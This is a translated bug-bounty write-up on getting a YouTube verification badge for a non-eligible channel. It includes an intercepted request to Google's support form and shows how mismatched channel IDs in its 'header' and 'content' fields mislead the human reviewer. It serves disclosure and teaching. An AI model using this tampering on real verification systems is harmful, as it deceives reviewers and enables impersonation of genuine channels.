白帽故事 · 2024年9月20日 0

如何为任意 YouTube 频道提供验证徽章

前言

本文将分享国外白帽如何为任意 YouTube 频道分配验证徽章的故事。

在故事开始前,有必要先科普一下验证徽章的一些背景知识:

验证徽章主要用于区分真正的名人或公司帐户与潜在的冒充者,从而防止可能导致的各种欺诈和冒充。

故事开始

首先,我们需要一个拥有 100,000 名以上订阅者的频道。因为这是获得徽章的前提条件。

Google工程师在设计该系统时考虑到,要进入提交请求的表单,需要在 Google账户中链接一个拥有 100,000+ 订阅者的频道。

当你没有达到所需条件时,会收到如下图的提示:

file

而当你符合条件时,会像下图所示:

file

然后是单击“立即申请”,会显示如下表格:

file

此处有 2 个字段:

  • 频道名称:当前频道的名称
  • 频道 ID:通常可以在 URL 或 youtube.com/account_advanced 中找到

填写这两个字段,然后打开诸如 Burp Suite 的代理工具,并拦截“提交”后生成的请求:

POST /apis/cufinsert?v=0&psd=%7B%7D&helpcenter=youtube&hl=en&key=support-content&request_source=1&service_configuration=&mendel_ids=REDACTED HTTP/1.1
Host: support.google.com
Cookie: SUPPORT_CONTENT=REDACTED
Content-Length: 5373
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Brave";v="126"
Content-Type: text/plain;charset=UTF-8
X-Supportcontent-Allowapicookieauth: true
X-Supportcontent-Xsrftoken: REDACTED
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 REDACTED
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.5
Origin: https://support.google.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

{"common_params":{"context_params":{"view_id":REDACTED}},"resource":{"form_id":"channel_verification","header":[{"name":"channel_name","value":"Japan"},{"name":"channel_id","value":"UCPu6Px6WxDjRgUNODpecwLg"},{"name":"subject_line","value":"Channel Verification Application"},{"name":"account_email","value":"redacted@gmail.com"},{"name":"\n\n:---- Automatically added fields ----","value":""},{"name":"Language","value":"en"},{"name":"IIILanguage","value":"en"},{"name":"country_code","value":"REDACTED"},{"name":"auto-helpcenter-id","value":"95"},{"name":"auto-helpcenter-name","value":"youtube"},{"name":"auto-internal-helpcenter-name","value":"youtube"},{"name":"auto-full-url","value":"https://support.google.com/youtube/contact/channel_verification?sjid=REDACTED"},{"name":"auto-user-logged-in","value":"true"},{"name":"auto-user-was-internal","value":"false"},{"name":"IssueType","value":"channel_verification"},{"name":"form-id","value":"channel_verification"},{"name":"form","value":"channel_verification"},{"name":"subject-line-field-id","value":"subject_line"},{"name":"body-text-field-id","value":""},{"name":"AutoDetectedBrowser","value":"Chrome 126.0.0.0"},{"name":"AutoDetectedOS","value":"Intel Mac OS X 10_15_7"},{"name":"MendelExperiments","value":"REDACTED"},{"name":"Form.support-content-visit-id","value":"REDACTED"},{"name":"experiment_0_id","value":""},{"name":"experiment_0_status","value":"OFF"}],"subject":"Channel Verification Application","content":"channel_name: Japan\nchannel_id: UCPu6Px6WxDjRgUNODpecwLg\nsubject_line: Channel Verification Application\naccount_email: redacted@gmail.com\n\n\n:---- Automatically added fields ----: \nLanguage: en\nIIILanguage: en\ncountry_code: REDACTED\nauto-helpcenter-id: 95\nauto-helpcenter-name: youtube\nauto-internal-helpcenter-name: youtube\nauto-full-url: https://support.google.com/youtube/contact/channel_verification?sjid=9325088441159645760-EU\nauto-user-logged-in: true\nauto-user-was-internal: false\nIssueType: channel_verification\nform-id: channel_verification\nform: channel_verification\nsubject-line-field-id: subject_line\nbody-text-field-id: \nAutoDetectedBrowser: Chrome 126.0.0.0\nAutoDetectedOS: Intel Mac OS X 10_15_7\nMendelExperiments: REDACTED\nForm.support-content-visit-id: REDACTED\nexperiment_0_id: \nexperiment_0_status: OFF\n","validate_only":false,"validation_info":"CgxjaGFubmVsX25hbWUKCmNoYW5uZWxfaWQKEXZlcmlmaWNhdGlvbl90ZXh0CgxzdWJqZWN0X2xpbmUKDWFjY291bnRfZW1haWw","language":"en","helpcenter_id":"95","active_experiments":"CjRzdWpfdmlkZW9fZXhwZXJpbWVudDo6c3VqX3ZpZGVvX2V4cGVyaW1lbnRfdHJlYXRtZW50","referer":"","referer_title":"","timezone_offset_minutes":420,"form_frd_values":[

请求大致是上面这样,上面的信息已经删除了所有 Cookie 和一些私人信息,因此上面所看到的是一个简化版本。

查看请求正文,首先为什么像 subject_line、account_email 和许多其它东西是客户端的?电子邮件应该从会话 Cookie 中派生,而不是从这样的字段派生。

接下来,再看body。由于某种原因,所有关键字段(如channel_name、channel_id 等)都存在两次。这确实会产生影响。

位于“header”下的第一批字段似乎更适用于后端,第二批相同的字段则位于“content”下。

这些内容的目的是让员工看到所提供的输入内容,从而进行验证,然后进行下一步操作,在本例中其实就是验证频道。

那么,如何验证一个不符合要求的频道呢?

非常简单,在“header” 中,插入不符合条件的频道ID,然后位于“channel_id:”之后在“content”中插入符合条件的频道ID字段。

最终的请求“header”部分如下:

"resource":{"form_id":"channel_verification","header":[{"name":"channel_name","value":"Japan"},{"name":"channel_id","value":"UCPu6Px6WxDjRgUNODpecwLg"},{"name":"subject_line","value":"Channel Verification Application"},

“UCPu6Px6WxDjRgUNODpecwLg”是一个10万订阅者以下的频道ID。

在“content”中的内容如下:

"content":"channel_name: Japan\nchannel_id: UC-9-kyTW8ZkZNDHQJ6FgpwQ\nsubject_line: Channel Verification Application

这里我使用了“UC-9-kyTW8ZkZNDHQJ6FgpwQ”,这是一个自动生成“音乐”的频道ID(https://youtube.com/channel/UC-9-kyTW8ZkZNDHQJ6FgpwQ

Google 员工收到了请求后,发现UC-9-kyTW8ZkZNDHQJ6FgpwQ正在请求验证通道,但实际上是UCPu6Px6WxDjRgUNODpecwLg正在请求验证 。

如果他们继续处理请求并进行了批准,那么系统就会将徽章分配给UCPu6Px6WxDjRgUNODpecwLg通道。

该漏洞于几个月前上报,白帽小哥也因此收获了 500 美元的赏金奖励,并且徽章还被保留了下来。

file

你学到了么?

以上内容由骨哥翻译并整理。

原文:https://vojtechcekal.medium.com/how-i-was-able-to-give-verification-badge-to-any-youtube-channel-and-bypass-needed-requirements-b88855afe4b7